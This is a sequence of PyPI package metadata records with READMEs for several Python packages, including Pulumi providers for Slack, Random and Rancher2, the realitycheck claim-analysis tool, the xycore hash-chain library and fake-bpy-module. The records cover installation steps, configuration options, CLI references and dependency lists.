### Node.js (JavaScript/TypeScript)
To use from JavaScript or TypeScript in Node.js, install using either `npm`:
```bash
npm install @pulumi/slack
```
or `yarn`:
```bash
yarn add @pulumi/slack
```
### Python
To use from Python, install using `pip`:
```bash
pip install pulumi_slack
```
### Go
To use from Go, use `go get` to grab the latest version of the library:
```bash
go get github.com/pulumi/pulumi-slack/sdk/go/...
```
### .NET
To use from .NET, install using `dotnet add package`:
```bash
dotnet add package Pulumi.Slack
```
## Configuration
The following configuration points are available for the `slack` provider:
- `slack:token` (environment: `SLACK_TOKEN`) - the token for your slack workspace
## Reference
For detailed reference documentation, please visit [the Pulumi registry](https://www.pulumi.com/registry/packages/slack/api-docs/).
| text/markdown | null | null | null | null | Apache-2.0 | pulumi, slack, category/utility | [] | [] | null | null | >=3.9 | [] | [] | [] | [
"parver>=0.2.1",
"pulumi<4.0.0,>=3.165.0",
"semver>=2.8.1",
"typing-extensions<5,>=4.11; python_version < \"3.11\""
] | [] | [] | [] | [
"Homepage, https://www.pulumi.com",
"Repository, https://github.com/pulumi/pulumi-slack"
] | twine/6.2.0 CPython/3.11.8 | 2026-02-20T06:45:47.794858 | pulumi_slack-1.0.0a1771569414.tar.gz | 16,112 | 89/be/f298747ea0aca64640f6ad6a3a1787d24409d83fd9edeef0924af39826e4/pulumi_slack-1.0.0a1771569414.tar.gz | source | sdist | null | false | 86a968e747580f8cd25268cbb38abf8e | 8f7782a8562ea9e82d555f1f1aa6339315f2220a902b41c0d6efe7c07fe697eb | 89bef298747ea0aca64640f6ad6a3a1787d24409d83fd9edeef0924af39826e4 | null | [] | 208 |
2.4 | pulumi-random | 4.20.0a1771569444 | A Pulumi package to safely use randomness in Pulumi programs. | [](https://github.com/pulumi/pulumi-random/actions)
[](https://slack.pulumi.com)
[](https://npmjs.com/package/@pulumi/random)
[](https://badge.fury.io/nu/pulumi.random)
[](https://pypi.org/project/pulumi-random)
[](https://pkg.go.dev/github.com/pulumi/pulumi-random/sdk/v4/go)
[](https://github.com/pulumi/pulumi-random/blob/master/LICENSE)
# Random Provider
The random provider allows the safe use of randomness in a Pulumi program. This allows you to generate resource
properties, such as names, that contain randomness in a way that works with Pulumi's goal state oriented approach.
Using randomness as usual would not work well with Pulumi, because by definition, each time the program is evaluated,
a new random state would be produced, necessitating re-convergence on the goal state. This provider understands
how to work with the Pulumi resource lifecycle to accomplish randomness safely and in a way that works as desired.
## Installing
This package is available in many languages in the standard packaging formats.
### Node.js (Java/TypeScript)
To use from JavaScript or TypeScript in Node.js, install using either `npm`:
$ npm install @pulumi/random
or `yarn`:
$ yarn add @pulumi/random
### Python
To use from Python, install using `pip`:
$ pip install pulumi_random
### Go
To use from Go, use `go get` to grab the latest version of the library
$ go get github.com/pulumi/pulumi-random/sdk/v4/go/...
### .NET
To use from .NET, install using `dotnet add package`:
$ dotnet add package Pulumi.Random
## Example
For example, to generate a random password, allocate a `RandomPassword` resource
and then use its `result` output property (of type `Output<string>`) to pass
to another resource.
```typescript
import * as pulumi from "@pulumi/pulumi";
import * as aws from "@pulumi/aws";
import * as random from "@pulumi/random";
const password = new random.RandomPassword("password", {
length: 16,
overrideSpecial: "_%@",
special: true,
});
const example = new aws.rds.Instance("example", {
password: password.result,
});
```
## Reference
For further information, please visit [the random provider docs](https://www.pulumi.com/docs/intro/cloud-providers/random) or for detailed reference documentation, please visit [the API docs](https://www.pulumi.com/docs/reference/pkg/random).
| text/markdown | null | null | null | null | Apache-2.0 | pulumi, random | [] | [] | null | null | >=3.9 | [] | [] | [] | [
"parver>=0.2.1",
"pulumi<4.0.0,>=3.165.0",
"semver>=2.8.1",
"typing-extensions<5,>=4.11; python_version < \"3.11\""
] | [] | [] | [] | [
"Homepage, https://pulumi.io",
"Repository, https://github.com/pulumi/pulumi-random"
] | twine/6.2.0 CPython/3.11.8 | 2026-02-20T06:45:44.597009 | pulumi_random-4.20.0a1771569444.tar.gz | 22,741 | de/26/17aefaa54b7cfa49ca6a043d57b90697a59002106146e4b2f00116c7858c/pulumi_random-4.20.0a1771569444.tar.gz | source | sdist | null | false | 23133bd376d8521ede5f44c975685aaf | 68d114aa7cc987c8c121663d11fb35e26f95ec43fca6e1e79831f8d39e07dcd8 | de2617aefaa54b7cfa49ca6a043d57b90697a59002106146e4b2f00116c7858c | null | [] | 229 |
2.4 | realitycheck | 0.3.3 | Framework for rigorous, systematic analysis of claims, sources, predictions, and argument chains | # Reality Check
A framework for rigorous, systematic analysis of claims, sources, predictions, and argument chains.
> With so many hot takes, plausible theories, misinformation, and AI-generated content, sometimes, you need a `realitycheck`.
## Overview
Reality Check helps you build and maintain a **unified knowledge base** with:
- **Claim Registry**: Track claims with evidence levels, credence scores, and relationships
- **Source Analysis**: Structured 3-stage methodology (descriptive → evaluative → dialectical)
- **Evidence Links**: Connect claims to sources with location, quotes, and strength ratings
- **Reasoning Trails**: Document credence assignments with full epistemic provenance
- **Prediction Tracking**: Monitor forecasts with falsification criteria and status updates
- **Argument Chains**: Map logical dependencies and identify weak links
- **Semantic Search**: Find related claims across your entire knowledge base
See [realitycheck-data](https://github.com/lhl/realitycheck-data) for a public example knowledge base built with Reality Check.
## Status
**v0.3.3** - Verification Loop + Upgrade Sync Hardening: factual verification gates, `rc-db backup`, integration auto-sync; 454 tests.
[](https://pypi.org/project/realitycheck/)
## Prerequisites
- **Python 3.11+**
- **[Claude Code](https://github.com/anthropics/claude-code/)** (optional) - For plugin integration
- **[OpenAI Codex](https://github.com/openai/codex)** (optional) - For skills integration
- **[Amp](https://ampcode.com)** (optional) - For skills integration
- **[OpenCode](https://opencode.ai)** (optional) - For skills integration
## Installation
### From PyPI (Recommended)
```bash
# Install with pip
pip install realitycheck
# Or with uv (faster)
uv pip install realitycheck # installs to active venv or system Python
# Verify installation
rc-db --help
```
### From Source (Development)
```bash
# Clone the framework
git clone https://github.com/lhl/realitycheck.git
cd realitycheck
# Install dependencies with uv
uv sync
# Verify installation
REALITYCHECK_EMBED_SKIP=1 uv run pytest -v
```
### GPU Support (Optional)
The default install uses CPU-only PyTorch. For GPU-accelerated embeddings:
```bash
# NVIDIA CUDA 12.8
uv sync --extra-index-url https://download.pytorch.org/whl/cu128
# AMD ROCm 6.4
uv sync --extra-index-url https://download.pytorch.org/whl/rocm6.4
```
**AMD TheRock nightly (e.g., gfx1151 / Strix Halo):**
TheRock nightlies provide support for newer AMD GPUs not yet in stable ROCm. Replace `gfx1151` with your GPU arch.
> **Note:** TheRock support is experimental. Newer architectures (gfx1151/RDNA 3.5, gfx1200/RDNA 4) may require matching system ROCm kernel drivers. Memory allocation may work but kernel execution can fail if there's a version mismatch between pip ROCm userspace and system kernel module.
```bash
# 1. Install matching ROCm SDK (system-wide)
pip install --index-url https://rocm.nightlies.amd.com/v2/gfx1151/ "rocm[libraries]" -U
# 2. Create fresh venv with ROCm torch
rm -rf .venv && uv venv --python 3.12
VIRTUAL_ENV=$(pwd)/.venv uv pip install --index-url https://rocm.nightlies.amd.com/v2/gfx1151/ torch
VIRTUAL_ENV=$(pwd)/.venv uv pip install sentence-transformers lancedb pyarrow pyyaml tabulate
# 3. Set library path and verify
export LD_LIBRARY_PATH="$(pip show rocm-sdk-core | grep Location | cut -d' ' -f2)/_rocm_sdk_devel/lib:$LD_LIBRARY_PATH"
.venv/bin/python -c "import torch; print(torch.version.hip); print(torch.cuda.is_available())"
```
Or set `UV_EXTRA_INDEX_URL` in your shell profile for persistent configuration.
**Note:** If switching GPU backends, force reinstall torch:
```bash
rm -rf .venv && uv sync --extra-index-url <your-index-url>
```
## Quick Start
### 1. Create Your Knowledge Base
```bash
# Create a new directory for your data
mkdir my-research && cd my-research
# Initialize a Reality Check project (creates structure + database)
rc-db init-project
# This creates:
# .realitycheck.yaml - Project config
# data/realitycheck.lance/ - Database
# analysis/sources/ - For analysis documents
# tracking/ - For prediction tracking
# inbox/ - For sources to process (staging)
# reference/primary/ - Filed primary documents
# reference/captured/ - Supporting materials
```
### 2. Set Environment Variable
```bash
# Tell Reality Check where your database is
export REALITYCHECK_DATA="data/realitycheck.lance"
# Add to your shell profile for persistence:
echo 'export REALITYCHECK_DATA="data/realitycheck.lance"' >> ~/.bashrc
```
### 3. Add Your First Claim
```bash
rc-db claim add \
--text "AI training costs double annually" \
--type "[F]" \
--domain "TECH" \
--evidence-level "E2" \
--credence 0.8
# Output: Created claim: TECH-2026-001
```
### 4. Add a Source
```bash
rc-db source add \
--id "epoch-2024-training" \
--title "Training Compute Trends" \
--type "REPORT" \
--author "Epoch AI" \
--year 2024 \
--url "https://epochai.org/blog/training-compute-trends"
```
### 5. Search and Explore
```bash
# Semantic search
rc-db search "AI costs"
# List all claims
rc-db claim list --format text
# Check database stats
rc-db stats
```
## Using with Framework as Submodule
For easier access to scripts, add the framework as a git submodule:
```bash
cd my-research
git submodule add https://github.com/lhl/realitycheck.git .framework
# Now use shorter paths:
.framework/scripts/db.py claim list --format text
.framework/scripts/db.py search "AI"
```
## CLI Reference
All commands should be run with `REALITYCHECK_DATA` set.
If `REALITYCHECK_DATA` is not set, commands will only run when a default database exists at `./data/realitycheck.lance/` (and will otherwise exit with a helpful error suggesting how to set `REALITYCHECK_DATA` or create a project via `rc-db init-project`). The Claude Code plugin can also auto-resolve project config via `.realitycheck.yaml`.
```bash
# Database management
rc-db init # Initialize database tables
rc-db init-project [--path DIR] # Create new project structure
rc-db stats # Show statistics
rc-db backup [--output-dir DIR] [--prefix NAME] [--dry-run] # Create timestamped .tar.gz backup
rc-db reset # Reset database (destructive!)
# Claim operations
rc-db claim add --text "..." --type "[F]" --domain "TECH" --evidence-level "E3"
rc-db claim ticket --domain "TECH" [--count N] # Reserve monotonic IDs for drafting/import
rc-db claim ticket release --abandoned --older-than-days 7 # Clean abandoned reservations
rc-db claim add --id "TECH-2026-001" --text "..." ... # With explicit ID
rc-db claim get <id> # Get single claim (JSON)
rc-db claim list [--domain D] [--type T] [--format json|text]
rc-db claim update <id> --credence 0.9 [--notes "..."]
rc-db claim delete <id> # Delete a claim
# Source operations
rc-db source add --id "..." --title "..." --type "PAPER" --author "..." --year 2024
rc-db source get <id>
rc-db source list [--type T] [--status S]
# Chain operations (argument chains)
rc-db chain add --id "..." --name "..." --thesis "..." --claims "ID1,ID2,ID3"
rc-db chain get <id>
rc-db chain list
# Prediction operations
rc-db prediction add --claim-id "..." --source-id "..." --status "[P→]"
rc-db prediction list [--status S]
# Search and relationships
rc-db search "query" [--domain D] [--limit N]
rc-db related <claim-id> # Find related claims
# Evidence links (epistemic provenance)
rc-db evidence add --claim-id "..." --source-id "..." --direction supporting --strength strong
rc-db evidence get <id>
rc-db evidence list [--claim-id C] [--source-id S]
rc-db evidence supersede <id> --reason "..." [--new-location "..."]
# Reasoning trails (credence audit)
rc-db reasoning add --claim-id "..." --credence 0.8 --evidence-level E2 --reasoning-text "..."
rc-db reasoning get <id>
rc-db reasoning list [--claim-id C]
rc-db reasoning history <claim-id> # Full credence history
# Analysis audit logs
rc-db analysis start --source-id "..." # Begin tracking
rc-db analysis mark <stage> # Mark stage completion
rc-db analysis complete # Finalize log
rc-db analysis list # List audit logs
# Import/Export
rc-db import <file.yaml> --type claims|sources|all
rc-validate # Check database integrity
rc-export yaml claims -o claims.yaml # Export to YAML
```
## Claude Code Plugin
[Claude Code](https://github.com/anthropics/claude-code/) is Anthropic's AI coding assistant. Reality Check includes a plugin that adds slash commands for analysis workflows.
### Install the Plugin
```bash
# From the realitycheck repo directory:
make install-plugin-claude
```
**Note:** Local plugin discovery from `~/.claude/plugins/local/` is currently broken. Use the `--plugin-dir` flag:
```bash
# Start Claude Code with the plugin loaded:
claude --plugin-dir /path/to/realitycheck/integrations/claude/plugin
# Or create a shell alias:
alias claude-rc='claude --plugin-dir /path/to/realitycheck/integrations/claude/plugin'
```
### Plugin Commands
Commands are prefixed with `/reality:`:
| Command | Description |
|---------|-------------|
| `/reality:check <url>` | **Flagship** - Full analysis workflow (fetch → analyze → register → validate) |
| `/reality:synthesize <topic>` | Cross-source synthesis across multiple analyses |
| `/reality:analyze <source>` | Manual 3-stage analysis without auto-registration |
| `/reality:extract <source>` | Quick claim extraction |
| `/reality:search <query>` | Semantic search across claims |
| `/reality:validate` | Check database integrity |
| `/reality:export <format> <type>` | Export to YAML/Markdown |
| `/reality:stats` | Show database statistics |
### Alternative: Global Skills
If you prefer skills over plugins:
```bash
make install-skills-claude
```
This installs skills to `~/.claude/skills/` which are auto-activated based on context.
### Example Session
```
> /reality:check https://arxiv.org/abs/2401.00001
Claude will:
1. Fetch the paper content
2. Run 3-stage analysis (descriptive → evaluative → dialectical)
3. Extract and classify claims
4. Register source and claims in your database
5. Validate data integrity
6. Report summary with claim IDs
```
See `docs/PLUGIN.md` for full documentation.
## Codex Skills
Codex doesn’t support Claude-style plugins, but it does support “skills”.
Codex CLI reserves `/...` for built-in commands, so custom slash commands are not supported. Reality Check ships Codex skills you can invoke with `$...`:
- `$check ...`
- `$realitycheck ...` (including `$realitycheck data <path>` to target a DB for the current Codex session)
Embeddings are generated by default when registering sources/claims. Only set `REALITYCHECK_EMBED_SKIP=1` (or use `--no-embedding`) when you explicitly want to defer embeddings.
Install:
```bash
make install-skills-codex
```
See `integrations/codex/README.md` for usage and examples.
## Amp Skills
[Amp](https://ampcode.com) is Sourcegraph's AI coding assistant. Reality Check includes skills that activate on natural language triggers.
### Install Skills
```bash
make install-skills-amp
```
### Usage
Skills activate automatically based on natural language:
```
"Analyze this article for claims: https://example.com/article"
"Search for claims about AI automation"
"Validate the database"
"Show database stats"
```
See `integrations/amp/README.md` for full documentation.
## OpenCode Skills
[OpenCode](https://opencode.ai) is an open-source AI coding agent with 80K+ GitHub stars. Reality Check includes skills that integrate with OpenCode's skill system.
### Install Skills
```bash
make install-skills-opencode
```
### Usage
Skills are loaded on-demand via OpenCode's `skill` tool:
```
Load the realitycheck skill
```
Or reference skills in prompts:
```
Using the realitycheck-check skill, analyze https://example.com/article
```
### Available Skills
| Skill | Description |
|-------|-------------|
| `realitycheck` | Main entry point |
| `realitycheck-check` | Full analysis workflow |
| `realitycheck-search` | Semantic search |
| `realitycheck-validate` | Data validation |
| `realitycheck-stats` | Database statistics |
See `integrations/opencode/README.md` for full documentation.
## Keeping Integrations Updated
When you upgrade Reality Check, CLI/package code updates immediately, but integrations (skills/plugin symlinks) may still point at older locations.
Reality Check now performs a best-effort auto-sync on first `rc-*` command run after a version change. It updates existing Reality Check-managed installs without overwriting unrelated user files.
Manual sync command:
```bash
# Update integrations that already have at least one Reality Check install
rc-db integrations sync --install-missing
# Install/update all supported integrations (skills + Claude plugin)
rc-db integrations sync --all
```
Disable auto-sync:
```bash
export REALITYCHECK_AUTO_SYNC=0
```
## Taxonomy Reference
### Claim Types
| Type | Symbol | Definition |
|------|--------|------------|
| Fact | `[F]` | Empirically verified, consensus reality |
| Theory | `[T]` | Coherent framework with empirical support |
| Hypothesis | `[H]` | Testable proposition, awaiting evidence |
| Prediction | `[P]` | Future-oriented with specified conditions |
| Assumption | `[A]` | Underlying premise (stated or unstated) |
| Counterfactual | `[C]` | Alternative scenario for comparison |
| Speculation | `[S]` | Unfalsifiable or untestable claim |
| Contradiction | `[X]` | Identified logical inconsistency |
### Evidence Hierarchy
| Level | Strength | Description |
|-------|----------|-------------|
| E1 | Strong Empirical | Replicated studies, systematic reviews, meta-analyses |
| E2 | Moderate Empirical | Single peer-reviewed study, official statistics |
| E3 | Strong Theoretical | Expert consensus, working papers, preprints |
| E4 | Weak Theoretical | Industry reports, credible journalism |
| E5 | Opinion/Forecast | Personal observation, anecdote, expert opinion |
| E6 | Unsupported | Pure speculation, unfalsifiable claims |
### Domain Codes
| Domain | Code | Description |
|--------|------|-------------|
| Technology | `TECH` | AI capabilities, tech trajectories |
| Labor | `LABOR` | Employment, automation, work |
| Economics | `ECON` | Value, pricing, distribution |
| Governance | `GOV` | Policy, regulation, institutions |
| Social | `SOC` | Social structures, culture, behavior |
| Resource | `RESOURCE` | Scarcity, abundance, allocation |
| Transition | `TRANS` | Transition dynamics, pathways |
| Geopolitics | `GEO` | International relations, competition |
| Institutional | `INST` | Organizations, coordination |
| Risk | `RISK` | Risk assessment, failure modes |
| Meta | `META` | Claims about the framework itself |
## Project Structure
```
realitycheck/ # Framework repo (this)
├── scripts/ # Python CLI tools
│ ├── db.py # Database operations + CLI
│ ├── validate.py # Data integrity checks
│ ├── export.py # YAML/Markdown export
│ ├── migrate.py # Legacy YAML migration
│ ├── embed.py # Embedding utilities (re-generate, status)
│ └── html_extract.py # HTML → {title, published, text} extraction
├── integrations/ # Tool integrations
│ ├── claude/ # Claude Code plugin + skills
│ ├── codex/ # OpenAI Codex skills
│ ├── amp/ # Amp skills
│ └── opencode/ # OpenCode skills
├── methodology/ # Analysis templates
│ ├── evidence-hierarchy.md
│ ├── claim-taxonomy.md
│ └── templates/
├── tests/ # pytest suite (454 tests)
└── docs/ # Documentation
my-research/ # Your data repo (separate)
├── .realitycheck.yaml # Project config
├── data/realitycheck.lance/ # LanceDB database
├── analysis/sources/ # Analysis documents
├── tracking/ # Prediction tracking
├── inbox/ # Sources to process (staging)
├── reference/primary/ # Filed primary documents
└── reference/captured/ # Supporting materials
```
## Why a Unified Knowledge Base?
Reality Check recommends **one knowledge base per user**, not per topic:
- Claims build on each other across domains (AI claims inform economics claims)
- Shared evidence hierarchy enables consistent evaluation
- Cross-domain synthesis becomes possible
- Semantic search works across your entire knowledge base
Create separate databases only for: organizational boundaries, privacy requirements, or team collaboration.
### Example Knowledge Base
See [realitycheck-data](https://github.com/lhl/realitycheck-data) for a public example knowledge base built with Reality Check, tracking claims across technology, economics, labor, and governance domains.
## Embedding Model
Reality Check uses `all-MiniLM-L6-v2` for semantic search embeddings. This model provides the best balance of performance and quality for CPU inference:
| Model | Dim | Load Time | Throughput | Memory |
|-------|-----|-----------|------------|--------|
| **all-MiniLM-L6-v2** | 384 | 2.9s | 7.8 q/s | 1.2 GB |
| all-mpnet-base-v2 | 768 | 3.0s | 3.3 q/s | 1.4 GB |
| granite-embedding-278m | 768 | 6.0s | 3.4 q/s | 2.5 GB |
| stella_en_400M_v5 | 1024 | 4.4s | 1.7 q/s | 2.7 GB |
The 384-dimension vectors are stored in LanceDB and used for similarity search across claims.
**Note:** Embeddings default to CPU to avoid GPU driver crashes. To use GPU:
```bash
export REALITYCHECK_EMBED_DEVICE="cuda" # or "mps" for Apple Silicon
```
## Development
```bash
# Run tests (skip slow embedding tests)
REALITYCHECK_EMBED_SKIP=1 uv run pytest -v
# Run all tests including embeddings
uv run pytest -v
# Run with coverage
uv run pytest --cov=scripts --cov-report=term-missing
```
## Development Stats Report
Generate `docs/STATUS-dev-stats.md` (per-tag development statistics) with:
```bash
python scripts/release_stats_rollup.py \
--repo-root . \
--with-scc \
--with-test-composition \
--output-json /tmp/realitycheck-release-stats.json \
--output-markdown docs/STATUS-dev-stats.md
```
This report includes:
- Release snapshot deltas vs prior release
- Velocity/cadence tables
- Cache-aware token and cost estimates for Codex + Claude
- Test composition and documentation churn
You can override pricing assumptions (including cached-token rates) with:
- `--price-gpt5-input-per-1m`
- `--price-gpt5-cached-input-per-1m`
- `--price-gpt5-output-per-1m`
- `--price-opus4-input-per-1m`
- `--price-opus4-cache-write-per-1m`
- `--price-opus4-cache-read-per-1m`
- `--price-opus4-output-per-1m`
See [CLAUDE.md](CLAUDE.md) for development workflow and contribution guidelines.
## Documentation
- [docs/PLUGIN.md](docs/PLUGIN.md) - Claude Code plugin guide
- [docs/SCHEMA.md](docs/SCHEMA.md) - Database schema reference
- [docs/WORKFLOWS.md](docs/WORKFLOWS.md) - Common usage workflows
- [docs/CHANGELOG.md](docs/CHANGELOG.md) - Release history and notes
- [methodology/](methodology/) - Analysis methodology and templates
## License
Apache 2.0
## Citation
If you use Reality Check in academic work, please cite:
Also see `CITATION.cff` for machine-readable citation metadata.
<!-- BEGIN REALITYCHECK_BIBTEX -->
```bibtex
@misc{lin2026realitycheck,
author = {Lin, Leonard},
title = {Reality Check},
year = {2026},
version = {0.3.3},
url = {https://github.com/lhl/realitycheck},
note = {Accessed: 2026-02-20}
}
```
<!-- END REALITYCHECK_BIBTEX -->
| text/markdown | null | Leonard Lin <lhl@lhl.org> | null | null | Apache-2.0 | analysis, claims, epistemics, lancedb, predictions, sources | [
"Development Status :: 3 - Alpha",
"Intended Audience :: Developers",
"Intended Audience :: Science/Research",
"License :: OSI Approved :: Apache Software License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Topic :: Scientific/Engineering"
] | [] | null | null | >=3.11 | [] | [] | [] | [
"beautifulsoup4>=4.12.0",
"lancedb>=0.18.0",
"pyarrow>=18.0.0",
"pyyaml>=6.0",
"sentence-transformers>=3.0.0",
"tabulate>=0.9.0",
"jinja2>=3.1.0; extra == \"dev\"",
"pytest-cov>=4.0.0; extra == \"dev\"",
"pytest>=8.0.0; extra == \"dev\""
] | [] | [] | [] | [
"Homepage, https://github.com/lhl/realitycheck",
"Repository, https://github.com/lhl/realitycheck",
"Documentation, https://github.com/lhl/realitycheck/blob/main/README.md"
] | twine/6.2.0 CPython/3.14.2 | 2026-02-20T06:44:59.286777 | realitycheck-0.3.3.tar.gz | 537,215 | 89/ff/89ad5a9c417e2b16e3cf0d624beb295667ea7d5381330ff9546171294c5d/realitycheck-0.3.3.tar.gz | source | sdist | null | false | f197ee643f999ad3596a5e8747e307fb | 43e6367c0324f5d15b66dc94d4a658fbad43679093c3d89ae79b754b842e893f | 89ff89ad5a9c417e2b16e3cf0d624beb295667ea7d5381330ff9546171294c5d | null | [
"LICENSE"
] | 230 |
2.4 | pulumi-rancher2 | 11.1.0a1771569264 | A Pulumi package for creating and managing rancher2 resources. | [](https://github.com/pulumi/pulumi-rancher2/actions)
[](https://slack.pulumi.com)
[](https://www.npmjs.com/package/@pulumi/rancher2)
[](https://pypi.org/project/pulumi-rancher2)
[](https://badge.fury.io/nu/pulumi.rancher2)
[](https://pkg.go.dev/github.com/pulumi/pulumi-rancher2/sdk/v11/go)
[](https://github.com/pulumi/pulumi-rancher2/blob/master/LICENSE)
# Rancher2 Resource Provider
The Rancher2 resource provider for Pulumi lets you manage Rancher2 resources in your cloud programs. To use
this package, please [install the Pulumi CLI first](https://pulumi.io/).
## Installing
This package is available in many languages in the standard packaging formats.
### Node.js (Java/TypeScript)
To use from JavaScript or TypeScript in Node.js, install using either `npm`:
$ npm install @pulumi/rancher2
or `yarn`:
$ yarn add @pulumi/rancher2
### Python
To use from Python, install using `pip`:
$ pip install pulumi_rancher2
### Go
To use from Go, use `go get` to grab the latest version of the library
$ go get github.com/pulumi/pulumi-rancher2/sdk/v11
### .NET
To use from .NET, install using `dotnet add package`:
$ dotnet add package Pulumi.Rancher2
## Configuration
The following configuration points are available for the `rancher2` provider:
- `rancher2:apiUrl` (Required) - The URL to the rancher API. It must be provided, but it can also be sourced from the
`RANCHER_URL` environment variable.
- `rancher2:accessKey` (Optional) - API Key used to authenticate with the rancher server. It can also be sourced from the
`RANCHER_ACCESS_KEY` environment variable.
- `rancher2:secretKey` (Optional) - API secret used to authenticate with the rancher server. It can also be sourced from
the `RANCHER_SECRET_KEY` environment variable.
- `rancher2:tokenKey` (Optional) - API token used to authenticate with the rancher server. It can also be sourced from
the `RANCHER_TOKEN_KEY` environment variable.
- `rancher2:caCerts` (Optional) - CA certificates used to sign rancher server tls certificates. Mandatory if self signed
tls and insecure option false. It can also be sourced from the `RANCHER_CA_CERTS` environment variable.
- `rancher2:bootstrap` (Optional) - Bootstrap rancher server. Default value is `false`. It can also be sourced from the
`RANCHER_BOOTSTRAP` environment variable.
- `rancher2:insecure` (Optional) - Allow insecure connections to Rancher. Mandatory if self signed tls and no caCerts
provided. Default value is `false`. It can also be sourced from the `RANCHER_INSECURE` environment variable.
## Reference
For further information, please visit [the Rancher2 provider docs](https://www.pulumi.com/docs/intro/cloud-providers/rancher2) or for detailed reference documentation, please visit [the API docs](https://www.pulumi.com/docs/reference/pkg/rancher2).
| text/markdown | null | null | null | null | Apache-2.0 | pulumi, rancher2 | [] | [] | null | null | >=3.9 | [] | [] | [] | [
"parver>=0.2.1",
"pulumi<4.0.0,>=3.165.0",
"semver>=2.8.1",
"typing-extensions<5,>=4.11; python_version < \"3.11\""
] | [] | [] | [] | [
"Homepage, https://pulumi.io",
"Repository, https://github.com/pulumi/pulumi-rancher2"
] | twine/6.2.0 CPython/3.11.8 | 2026-02-20T06:44:48.455537 | pulumi_rancher2-11.1.0a1771569264.tar.gz | 361,798 | f1/50/df87eea903209317804cb070e4f65b0344c0f47ff31ca1f35ba966354047/pulumi_rancher2-11.1.0a1771569264.tar.gz | source | sdist | null | false | 25358ecf7df03b4f00522f4ef6e00ab7 | 8027d1c53ff416c2d21bca887d7d8672aa53344fcab6cfe36f139c8e5374b1ee | f150df87eea903209317804cb070e4f65b0344c0f47ff31ca1f35ba966354047 | null | [] | 209 |
2.4 | xycore | 1.0.2 | The XY primitive — cryptographic verification for any system. | # xycore
[](https://pypi.org/project/xycore/)
[](https://pypi.org/project/xycore/)
[](LICENSE)
The zero-dependency cryptographic protocol for proving state transitions.
X is state before. Y is state after. XY is proof the transition
happened. Chain them. Anyone can verify.
Not a blockchain. Not a database. Not a logging framework.
A standalone protocol — the cryptographic core, extracted,
with nothing else attached.
## Install
pip install xycore
## Usage
from xycore import XYChain
chain = XYChain(name="my-chain")
chain.append("deploy",
x_state={"version": "1.0"},
y_state={"version": "1.1"}
)
chain.append("configure",
x_state={"version": "1.1"},
y_state={"version": "1.1", "configured": True}
)
valid, break_index = chain.verify()
assert valid
## Properties
- Zero dependencies. Standard library only.
- Works offline. Works without an account. Works forever.
- Anyone can implement against this spec in any language.
- Anyone can verify a chain independently — no trust required.
## Signatures (optional)
pip install xycore[signatures]
## pruv
pruv is the verification layer built on xycore.
https://pruv.dev
| text/markdown | null | null | null | null | MIT | null | [
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Topic :: Security :: Cryptography",
"Topic :: Software Development :: Libraries",
"Typing :: Typed"
] | [] | null | null | >=3.10 | [] | [] | [] | [
"cryptography>=41.0; extra == \"signatures\""
] | [] | [] | [] | [
"Homepage, https://pruv.dev",
"Documentation, https://docs.pruv.dev",
"Repository, https://github.com/mintingpressbuilds/pruv"
] | twine/6.2.0 CPython/3.11.14 | 2026-02-20T06:44:35.655666 | xycore-1.0.2.tar.gz | 19,032 | bd/2f/03480345fa7580275f72bd11a87a85ea16ecca1a0272b2720ed277b827c1/xycore-1.0.2.tar.gz | source | sdist | null | false | d65a5cea112f24f2265225fbbdc976f6 | b5ad31f25c6944a6f2cedba7e18b3d0a1f2aaca6db112008eff925db2b59ee72 | bd2f03480345fa7580275f72bd11a87a85ea16ecca1a0272b2720ed277b827c1 | null | [
"LICENSE"
] | 236 |
2.4 | fake-bpy-module | 20260220 | Collection of the fake Blender Python API module for the code completion. | # Fake Blender Python API module collection: fake-bpy-module
fake-bpy-module is the collections of the fake Blender Python API modules for
the code completion in commonly used IDEs.
Note: The similar project for Blender Game Engine (BGE) is available on
[fake-bge-module](https://github.com/nutti/fake-bge-module) which targets
[UPBGE](https://upbge.org/).

*To realize the long support of this project, your support is helpful.*
*You can support the development of this project via*
**[GitHub Sponsors](https://github.com/sponsors/nutti)**.
*See [the contribution document](CONTRIBUTING.md) for the detail of*
*the support.*
## Requirements
fake-bpy-module uses typing module and type hints which are available from
Python 3.8. Check your Python version is >= 3.8.
## Install
fake-bpy-module can be installed via a pip package, or pre-generated modules.
You can also generate and install modules manually.
### Install via pip package
fake-bpy-module is registered to PyPI.
You can install it as a pip package.
#### Install a latest package
If you install fake-bpy-module for Blender latest build (main branch daily
build powered by [nutti/blender-daily-build](https://github.com/nutti/blender-daily-build)),
run below command.
```sh
pip install fake-bpy-module
```
or, specify version "latest".
```sh
pip install fake-bpy-module-latest
```
#### Install a version specific package
If you want to install a version specific package, run below command.
```sh
pip install fake-bpy-module-<version>
```
If you install fake-bpy-module for Blender 2.93, run below command.
```sh
pip install fake-bpy-module-2.93
```
*Note: For PyCharm users, change the value `idea.max.intellisense.filesize` in
`idea.properties` file to more than 2600 because some modules have the issue of
being too big for intelliSense to work.*
##### Supported Blender Version
|Version|PyPI|
|---|---|
|2.78|[https://pypi.org/project/fake-bpy-module-2.78/](https://pypi.org/project/fake-bpy-module-2.78/)|
|2.79|[https://pypi.org/project/fake-bpy-module-2.79/](https://pypi.org/project/fake-bpy-module-2.79/)|
|2.80|[https://pypi.org/project/fake-bpy-module-2.80/](https://pypi.org/project/fake-bpy-module-2.80/)|
|2.81|[https://pypi.org/project/fake-bpy-module-2.81/](https://pypi.org/project/fake-bpy-module-2.81/)|
|2.82|[https://pypi.org/project/fake-bpy-module-2.82/](https://pypi.org/project/fake-bpy-module-2.82/)|
|2.83|[https://pypi.org/project/fake-bpy-module-2.83/](https://pypi.org/project/fake-bpy-module-2.83/)|
|2.90|[https://pypi.org/project/fake-bpy-module-2.90/](https://pypi.org/project/fake-bpy-module-2.90/)|
|2.91|[https://pypi.org/project/fake-bpy-module-2.91/](https://pypi.org/project/fake-bpy-module-2.91/)|
|2.92|[https://pypi.org/project/fake-bpy-module-2.92/](https://pypi.org/project/fake-bpy-module-2.92/)|
|2.93|[https://pypi.org/project/fake-bpy-module-2.93/](https://pypi.org/project/fake-bpy-module-2.93/)|
